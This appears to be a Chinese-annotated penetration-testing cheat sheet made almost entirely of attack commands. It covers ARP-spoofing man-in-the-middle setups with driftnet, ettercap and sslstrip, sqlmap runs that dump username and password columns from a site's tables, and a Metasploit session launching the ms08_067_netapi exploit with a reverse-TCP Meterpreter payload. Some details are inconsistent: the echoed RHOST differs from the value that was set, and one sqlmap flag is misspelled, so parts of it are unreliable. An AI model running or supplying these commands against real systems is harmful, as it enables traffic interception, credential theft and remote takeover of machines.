arpspoof -i eth0 -t 192.168.1.3 192.168.1.1
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i eth0 -t 192.168.1.3 192.168.1.1
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i eth0 -t 192.168.1.3 192.168.1.1
开启新的终端
driftnet -i eth0
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i eth0 -t 192.168.1.3 192.168.1.1
开启新的终端
ettercap -Tq -i eth0
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i eth0 -t 192.168.1.3 192.168.1.1
开启一个新的终端
sslstrip -a -f -k
开启一个新的终端
ettercap -Tq -i eth0
sqlmap -u "http://www.example.com/news.asp?id=110"
sqlmap -u "http://www.example.com/news.asp?id=110" --tables
sqlmap -u "http://www.example.com/news.asp?id=110" --columns -T "user"
sqlmap -u "http://www.example.com/news.asp?id=110" --dump -C "username,password" -T "user"
sqlmap -u "http://www.example.com/news.php?id=110"
sqlmap -u "http://www.example.com/news.php?id=110" --is-dba
sqlmap -u "http://www.example.com/news.php?id=110" --dbs
sqlmap -u "http://www.example.com/news.php?id=110" --current-db
sqlmap -u "http://www.example.com/news.php?id=110" --tables -D "db"
sqlmap -u "http://www.example.com/news.php?id=110" --colums -T "admin_user" -D
sqlmap -u "http://www.example.com/news.php" --cookie "id=110" --level 2
sqlmap -u "http://www.example.com/news.php" --columns -T "user" --cookie "id=110" --level 2
sqlmap -u "http://www.example.com/news.php" --dump -C "username,password" -T "user" --cookie "id=110" --level 2
##启动metasploit
root@kali:~# msfconsole
_ _
/ \ /\ __ _ __ /_/ __
| |\ / | _____ \ \ ___ _____ | | / \ _ \ \
| | \/| | | ___\ |- -| /\ / __\ | -__/ | || | || | |- -|
|_| | | | _|__ | |_ / -\ __\ \ | | | | \__/| | | |_
|/ |____/ \___\/ /\ \\___/ \/ \__| |_\ \___\
Frustrated with proxy pivoting? Upgrade to layer-2 VPN pivoting with
Metasploit Pro -- learn more on http://rapid7.com/metasploit
=[ metasploit v4.11.5-2016010401 ]
+ -- --=[ 1517 exploits - 875 auxiliary - 257 post ]
+ -- --=[ 437 payloads - 37 encoders - 8 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
###基本命令
msf > help
msf > show
msf > clear
###设置选项并攻击
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show options
msf exploit(ms08_067_netapi) > set RHOST 192.168.1.3
RHOST => 219.225.51.172
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > show options
msf exploit(ms08_067_netapi) > set LHOST 192.168.1.2
LHOST => 192.168.1.2
msf exploit(ms08_067_netapi) > exploit